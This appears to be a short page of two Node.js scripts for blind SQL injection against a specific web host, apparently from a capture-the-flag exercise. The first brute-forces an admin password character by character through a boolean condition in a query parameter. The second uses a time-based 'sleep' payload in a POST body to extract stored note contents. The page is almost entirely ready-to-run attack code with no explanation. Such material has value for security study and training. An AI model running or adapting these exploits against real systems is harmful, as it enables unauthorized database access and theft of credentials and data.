Sql Injection with NodeJS

   

Blind

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
const request = require('request');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz={/}:.,_';

option = (query) => ({
"headers": {
"Host": "p6.is",
"User-Agent": "Mozilla/5.0",
"Accept": "text/html",
"Cookie": "PHPSESSID=posix"
},
"qs": { "pw" : `' || id=0x61646d696e && pw like 0x${Buffer.from(query).toString('hex')}25 #`},
"method": "GET",
"uri": "http://p6.is/page.php"
});

function exploit(data = '') {
for (let chr of dict) {
request(option(data + chr), function(err, res, body) {
if (body.indexOf('Hello admin') !== -1) {
console.log(data + chr);
exploit(data + chr);
}
});
}
}

exploit();

Time based Blind

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
const request = require('request-promise');
const dict = '0123456789abcdefghijklmnopqrstuvwxyz:={}./_';
const delay = 2;

const option = (query) => ({
"headers": {
"Host": "p6.is",
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": "PHPSESSID=posix"
},
"body": `order=(select concat(title,0x3a,contents) from note where id=0x61646d696e)` +
`like 0x${Buffer.from(query).toString('hex')}25 and sleep(${delay})`,
"method": "POST",
"uri": "http://p6.is/"
});


async function exploit(data = '') {
for (let chr of dict) {

var query = data + chr
var begin = new Date().getTime();

await request(option(query));

if (new Date().getTime() - begin > delay * 1000) {
console.log(data + chr);
return exploit(data + chr);
}
}
}

exploit();